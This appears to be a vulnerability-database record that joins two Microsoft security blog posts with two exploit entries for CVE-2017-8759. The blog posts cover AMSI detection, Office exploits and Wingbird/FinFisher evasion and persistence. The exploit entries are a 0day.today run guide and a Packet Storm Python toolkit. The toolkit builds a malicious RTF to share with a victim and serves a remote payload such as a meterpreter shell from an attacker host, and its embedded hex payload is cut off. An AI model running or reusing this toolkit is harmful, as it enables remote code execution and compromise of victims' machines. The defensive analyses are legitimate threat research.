behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/7-amsi-ml-kovter-script-captured.png>)\n\n_Figure _6_. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis_\n\n## Fresh machine learning insight with AMSI\n\nWhile AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.\n\nAs outlined in [our previous blog](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>), we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/8-amsi-ml-process-tree.png>)\n\n_Figure 7. Process tree augmented by instrumentation for AMSI data_\n\nAs shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (_winword.exe_) to launch PowerShell (_powershell.exe)_. In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware _fhjUQ72.tmp_, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build _expert classifiers_ for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.\n\nWith the instrumentation of AMSI signals added as part of the [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. Weve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, [_ngrams_](<https://azure.microsoft.com/en-au/services/cognitive-services/text-analytics/>), and specific API invocations, to name a few.\n\nAs AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our _deep neural networks_ automatically learn features that are often hidden from human analysts.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/9-amsi-ml-javascript-powershell-alert.png>)\n\n_Figure 8. Machine learning detections of JavaScript and PowerShell scripts_\n\nWhile these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/10-amsi-ml-vbscript-network-alert.png>)\n\n_Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity_\n\n## Detection of AMSI bypass attempts\n\nWith AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:\n\n * Bypasses that are part of the script content and can be inspected and alerted on\n * Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs\n * Patching of AMSI instrumentation in memory\n\nThe Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.\n\nDuring actual [attacks involving CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>), Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by [Matt Graeber](<https://twitter.com/mattifestation/status/735261176745988096?lang=en>).\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/11-amsi-ml-bypass-alert.png>)\n\n_Figure 10. Windows Defender ATP alert based on AMSI bypass pattern_\n\nAMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/12b-amsi-ml-bypass-code-captured.png>)\n\n_Figure 11. AMSI bypass code sent to the cloud for analysis_\n\n## Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks\n\nProvided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.\n\nAMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.\n\nWith [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.\n\nApart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.\n\nTo benefit from the new script runtime instrumentation and other powerful security enhancements like [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/>), customers are encourage to install [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>).\n\nRead the [The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester](<https://wincom.blob.core.windows.net/documents/WDATP_TEI%20_infographic%20_final.pdf>) to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advance attacks, [sign up for a free trial](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n**Stefan Sellmer**, _Windows Defender ATP Research_\n\n_with_\n\n**Shay Kels**_, Windows Defender ATP Research _\n\n**Karthik Selvaraj**,_ Windows Defender Research_\n\n#### \n\n \n\n##### **Additional readings**\n\n * [Defend against PowerShell attacks](<https://blogs.msdn.microsoft.com/powershell/2017/10/23/defending-against-powershell-attacks/>), by Lee Holmes and the PowerShell team\n * [Windows Defender ATP machine learning: Detecting new and unusual breach activity](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>)\n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).", "modified": "2017-12-04T14:00:07", "published": "2017-12-04T14:00:07", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/", "id": "MSSECURE:30A997667BFA925FD541E3DCB1F1DEB6", "type": "mssecure", "title": "Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that \u2018live off the land\u2019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-16T03:40:26", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-1099", "CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8570", "CVE-2017-8750", "CVE-2017-8759"], "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>)protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore protected view warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the _htafile_ OLE object, was fixed in [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking them up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in script moniker, was also released. When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute a remote code, as shown in Figure 3.\n\n\n\n_Figure 3. PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8750>), which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in .Net Framework while parsing WSDL definition using SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code in vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple VM-layered malware, FinFisher, whose techniques we discuss in the succeeding section.\n\nThe CVE-2017-8759 exploit soon got ported to PPSX file. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, onSeptember 28,2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory, corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as element type in the malicious RTF attachment. This element is not supported in RTF official specification but serves as an effective obfuscation for static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. PowerShell payload from the HTA file_\n\nHowever, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.\n\n### WingBird (also known as FinFisher)\n\n[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in their attack campaigns.\n\nThe group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a [blog](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):\n\n * CVE-2015-5119 (Adobe Flash)\n * CVE-2016-4117 (Adobe Flash)\n * CVE-2017-8759 (Microsoft Office)\n * CVE-2017-11292 (Adobe Flash)\n\nThe interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Heres a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.\n\nThe Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that can probe if it is being run in virtualized or debugged environments. We found at least 12 different checks to evade the malwares execution in these environments. The most effective ones are:\n\n * Sandbox environment checks\n * Checks if the malware is executed under the root folder of a drive\n * Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents\n\n\n\n * Fingerprinting check\n * Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources\n * VM detection\n * Checks if the machine hardware IDs are _VmBus_ in case of HyperV, or _VEN_15AD_ in case of VMware, etc.\n * Debugger detection\n * Detects debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)\n\n\n\nThe latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:\n\n * _ [randomName].cab_ -Encrypted configuration file\n * _ setup.cab_ - The last PE code section of the setup module; content still unknown\n * _ d3d9.dll_ -Malware loader used on system with restricted privileges; the module is protected by a VM\n * _ aepic.dll_ (or other name) - Malware loader used on admin privileged systems; executed from (and injected into) a faked service; protected by a VM\n * _ msvcr90.dll_ - Malware loader DLL injected into explorer.exe or winlogon.exe process; protected by a VM\n * _ [randomName].7z_ - Encrypted network plugin, used to spy the victim network communications\n * _ wsecedit.rar_ - Main malware dropped executable, protected by a VM\n\nIn the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in [_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>), or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.\n\n_HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run_ \n_ Value: \"{Random value taken from config file}\"_ \n_ With data: \"C:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE C:\\PROGRAMDATA\\AUDITAPP\\D3D9.DLL, CONTROL_RUN\"_\n\nIf the startup command is 2, the malware copies explorer.exe in the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL in memory using the DLL sideloading technique.\n\nAll of Wingbirds plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connection, or even diverting SSL connections.\n\nGiven the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.\n\n## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite\n\nMicrosoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like below in Office 365s Threat Explorer page:\n\n\n\n\n\n_Figure 7. Office 365 ATP detection_\n\nCustomers using [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.\n\n\n\n_Figure 8. Windows Defender ATP alert_\n\nIn addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).\n\n\n\n_Figure 9. Windows Defender Exploit Guard detection_\n\nCrimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.\n\nAtMicrosoft, we dont stop working to protect our customers mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.", "modified": "2017-11-21T13:46:01", "published": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-14T04:24:23", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2017-09-13T00:00:00", "title": "Microsoft Windows .NET Framework - Remote Code Execution 0day Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-13T00:00:00", "href": "https://0day.today/exploit/description/28535", "id": "1337DAY-ID-28535", "sourceData": "Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\r\n \r\nRunning CVE-2017-8759 exploit sample.\r\n \r\nFlow of the exploit:\r\n \r\nWord macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe\r\n \r\nTo test:\r\n \r\nRun a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080\r\n \r\nIf all is good mspaint should run.\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28535"}], "packetstorm": [{"lastseen": "2017-09-15T10:22:49", "description": "", "published": "2017-09-14T00:00:00", "type": "packetstorm", "title": "Microsoft .NET Framework Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-14T00:00:00", "id": "PACKETSTORM:144148", "href": "https://packetstormsecurity.com/files/144148/Microsoft-.NET-Framework-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n''' \n \n## Exploit toolkit CVE-2017-8759 - v1.0 (https://github.com/bhdresh/CVE-2017-8759) ## \n \n''' \nimport os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile \nfrom random import randint \nfrom random import choice \nfrom string import ascii_uppercase \nfrom zipfile import ZipFile, ZIP_STORED, ZipInfo \n \n \nBACKLOG = 50 # how many pending connections queue will hold \nMAX_DATA_RECV = 999999 # max number of bytes we receive at once \nDEBUG = True # set to True to see the debug msgs \ndef main(argv): \n# Host and Port information \nglobal port \nglobal host \nglobal filename \nglobal docuri \nglobal payloadurl \nglobal payloadlocation \nglobal custom \nglobal mode \nglobal obfuscate \nglobal payloadtype \nfilename = '' \ndocuri = '' \npayloadurl = '' \npayloadlocation = '' \ncustom = '' \nport = int(\"80\") \nhost = '' \nmode = '' \nobfuscate = int(\"0\") \npayloadtype = 'rtf' \n \n# Capture command line arguments \ntry: \nopts, args = getopt.getopt(argv,\"hM:w:u:p:e:l:H:x:t:\",[\"mode=\",\"filename=\",\"docuri=\",\"port=\",\"payloadurl=\",\"payloadlocation=\",\"custom=\",\"obfuscate=\",\"payloadtype=\"]) \nexcept getopt.GetoptError: \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit(2) \nfor opt, arg in opts: \nif opt == '-h': \nprint \"\\nThis is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)\\n\" \nprint \"Modes:\\n\" \nprint \" -M gen Generate Malicious file only\\n\" \nprint \" Generate malicious payload:\\n\" \nprint \" -w <Filename.rtf> Name of malicious RTF file (Share this file with victim).\\n\" \nprint \" -u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running.\\n\" \nprint \" For example, http://attacker.com/test.txt (This URL will be included in malicious file and\\n\" \nprint \" will be requested once victim will open malicious RTF file.\\n\" \nprint \" -M exp Start exploitation mode\\n\" \nprint \" Exploitation:\\n\" \nprint \" -p <TCP port:Default 80> Local port number.\\n\" \nprint \" -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.\\n\" \nprint \" -l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.\\n\" \nsys.exit() \nelif opt in (\"-M\",\"--mode\"): \nmode = arg \nelif opt in (\"-w\", \"--filename\"): \nfilename = arg \nelif opt in (\"-u\", \"--docuri\"): \ndocuri = arg \nelif opt in (\"-p\", \"--port\"): \nport = int(arg) \nelif opt in (\"-e\", \"--payloadurl\"): \npayloadurl = arg \nelif opt in (\"-l\", \"--payloadlocation\"): \npayloadlocation = arg \nif \"gen\" in mode: \nif (len(filename)<1): \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \nif (len(docuri)<1): \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \nprint \"Generating normal RTF payload.\\n\" \ngenerate_exploit_rtf() \nsys.exit() \nmode = 'Finished' \nif \"exp\" in mode: \n \nif (len(payloadurl)<1): \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \nif (len(payloadurl)>1 and len(payloadlocation)<1): \nprint \"Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect\" \nexploitation_rtf() \nmode = 'Finished' \nsys.exit() \nif (len(payloadurl)>1 and len(payloadlocation)>1): \nprint \"Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect\" \nexploitation_rtf() \nmode = 'Finished' \nif not \"Finished\" in mode: \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \ndef generate_exploit_rtf(): \n# Preparing malicious RTF \ns = docuri \ndocuri_hex = \"00\".join(\"{:02x}\".format(ord(c)) for c in s) \ndocuri_pad_len = 714 - len(docuri_hex) \ndocuri_pad = \"0\"*docuri_pad_len \npayload = \"{\\\\rtf1\\\\adeflang1025\\\\ansi\\\\ansicpg1252\\\\uc1\\\\adeff31507\\\\deff0\\\\stshfdbch31505\\\\stshfloch31506\\\\stshfhich31506\\\\stshfbi31507\\\\deflang1033\\\\deflangfe2052\\\\themelang1033\\\\themelangfe2052\\\\themelangcs0\\n\" \npayload += \"{\\\\info\\n\" \npayload += \"{\\\\author }\\n\" \npayload += \"{\\\\operator }\\n\" \npayload += \"}\\n\" \npayload += \"{\\\\*\\\\xmlnstbl {\\\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\\n\" \npayload += \"{\\n\" \npayload += \"{\\\\object\\\\objautlink\\\\objupdate\\\\rsltpict\\\\objw291\\\\objh230\\\\objscalex99\\\\objscaley101\\n\" \npayload += \"{\\\\*\\\\objclass Word.Document.8}\\n\" \npayload += \"{\\\\*\\\\objdata 010500000200000008000000e2bae4e53e2231000000000000000000000a0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff010000000003000000000000c000000000000046000000000000000000000000f02c1951c8e5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000d8010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000020000000300000004000000050000000600000007000000fefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff